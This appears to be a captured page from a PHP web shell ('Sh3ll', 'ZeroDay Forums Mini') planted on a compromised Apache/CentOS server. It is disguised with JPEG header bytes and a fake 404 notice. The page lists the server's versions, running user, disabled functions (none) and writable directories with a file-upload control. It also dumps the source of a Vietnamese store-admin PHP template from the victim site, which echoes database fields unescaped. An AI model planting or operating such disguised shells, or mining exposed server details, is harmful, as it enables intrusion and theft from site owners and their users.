ÿØÿàJFIFÿÛ„ ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /proc/self/root/var/www/html/tien-dien/code/admin/store/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/self/root/var/www/html/tien-dien/code/admin/store/list_tpl.php
<div class="card">
    <div class="card-header">
        <h3 class="card-title">Danh sách cửa hàng</h3>
        <div class="card-tools">
            <a href="?act=admin&code=store&type=store" class="btn btn-primary btn-sm"><i class="fas fa-plus"></i> Thêm cửa hàng mới</a>
            <a href="?act=admin&code=store&type=install" class="btn btn-info btn-sm ml-2"><i class="fas fa-database"></i> Cài đặt CSDL</a>
            <a href="?act=admin&code=product" class="btn btn-secondary btn-sm ml-2"><i class="fas fa-box"></i> Quản lý sản phẩm</a>
        </div>
    </div>
    <div class="card-body">
        <table class="table table-bordered table-striped">
            <thead>
                <tr>
                    <th style="width: 50px;">ID</th>
                    <th>Tên cửa hàng</th>
                    <th>Mô tả</th>
                    <th>Ngưá»i quản lý</th>
                    <th>Trạng thái</th>
                    <th style="width: 150px;">Thao tác</th>
                </tr>
            </thead>
            <tbody>
                <?php if (count($stores) > 0): ?>
                    <?php foreach ($stores as $store): ?>
                        <tr>
                            <td><?php echo $store['store_id']; ?></td>
                            <td><?php echo $store['store_name']; ?></td>
                            <td><?php echo $store['store_description']; ?></td>
                            <td><?php echo $store['user_key']; ?></td>
                            <td><?php echo $store['status_text']; ?></td>
                            <td>
                                <a href="?act=admin&code=store&type=store&id=<?php echo $store['store_id']; ?>" class="btn btn-info btn-sm">Sá»­a</a>
                                <a href="?act=admin&code=store&type=store_products&store_id=<?php echo $store['store_id']; ?>" class="btn btn-success btn-sm">Sản phẩm</a>
                                <a href="?act=admin&code=store&type=del&id=<?php echo $store['store_id']; ?>" class="btn btn-danger btn-sm" onclick="return confirm('Bạn có chắc chắn muốn xóa cửa hàng này?')">Xóa</a>
                            </td>
                        </tr>
                    <?php endforeach; ?>
                <?php else: ?>
                    <tr>
                        <td colspan="6" class="text-center">Không có cửa hàng nào</td>
                    </tr>
                <?php endif; ?>
            </tbody>
        </table>
    </div>
</div>

ZeroDay Forums Mini